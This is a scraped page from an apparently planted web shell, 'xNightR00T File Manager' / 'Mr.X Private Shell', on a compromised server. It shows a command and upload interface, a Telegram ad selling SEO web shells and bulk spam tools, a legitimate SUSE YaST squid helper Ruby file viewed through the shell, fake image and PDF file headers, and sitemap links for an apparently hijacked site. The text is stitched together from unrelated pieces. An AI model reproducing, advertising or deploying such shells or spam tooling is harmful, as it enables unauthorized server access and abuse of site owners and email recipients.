xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# ------------------------------------------------------------------------------
# Copyright (c) 2006 Novell, Inc. All Rights Reserved.
#
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of version 2 of the GNU General Public License as published by the
# Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, contact Novell, Inc.
#
# To contact Novell about this file by physical or electronic mail, you may find
# current contact information at www.novell.com.
# ------------------------------------------------------------------------------

# File:	include/squid/helper_functions.ycp
# Package:	Configuration of squid
# Summary:	Helper functions for various situations.
# Authors:	Daniel Fiser <dfiser@suse.cz>
#
# $Id: dialogs.ycp 27914 2006-02-13 14:32:08Z locilka $
module Yast
  module SquidHelperFunctionsInclude
    def initialize_squid_helper_functions(include_target)
      textdomain "squid"

      Yast.import "FileUtils"
    end

    # Returns a widget with setting of units
    def sizeUnitWidget(id)
      ComboBox(Id(id), _("&Units"), [Item("KB"), Item("MB")])
    end

    # Returns multiple which equals to given parameter.
    def unitToMultiple(unit)
      return 1024 if unit == "KB"
      return 1024 * 1024 if unit == "MB"

      nil
    end


    # Returns a widget with setting of units
    def timeUnitWidget(id)
      ComboBox(
        Id(id),
        " ",
        [
          Item(Id("seconds"), _("seconds")),
          Item(Id("minutes"), _("minutes")),
          Item(Id("hours"), _("hours")),
          Item(Id("days"), _("days"))
        ]
      )
    end


    def isCorrectPathnameOfLogFile(str)
      ok = Builtins.regexpmatch(str, "^/([^/]+/)*[^/]+$")
      if ok
        dir = Builtins.regexptokenize(str, "^(.+)/[^/]+$")
        ok = false if !FileUtils.IsDirectory(Ops.get(dir, 0, "/"))
      end
      ok
    end

    def isIPAddr(str)
      ok = true
      l = Builtins.regexptokenize(
        str,
        "^([0-9]+)\\.([0-9]+)\\.([0-9]+)\\.([0-9]+)$"
      )

      if Builtins.size(l) != 4
        ok = false
      else
        i = 0
        Builtins.foreach(l) do |value|
          i = Builtins.tointeger(value)
          if Ops.less_than(i, 0) || Ops.greater_than(i, 255)
            ok = false
            raise Break
          end
        end
      end

      ok
    end

    def isHostName(str)
      #max 22 chars length
      #see http://www.no-ip.com/support/faq/EN/dynamic_ddns/what_is_a_valid_hostname.html
      Builtins.regexpmatch(str, "^[a-zA-Z0-9][a-zA-Z0-9-]{0,21}$")
    end

    def isCorrectHost(host)
      return false if !isIPAddr(host) && !isHostName(host)
      true
    end
  end
end

Filemanager

Name Type Size Permission Actions
SquidACL_local_functions.rb File 17.36 KB 0644
complex.rb File 13.74 KB 0644
dialogs.rb File 11.41 KB 0644
handlers.rb File 10.14 KB 0644
helper_functions.rb File 2.97 KB 0644
helps.rb File 8.51 KB 0644
inits.rb File 14.38 KB 0644
popup_dialogs.rb File 10.46 KB 0644
store_del.rb File 21.48 KB 0644
wizards.rb File 2.94 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml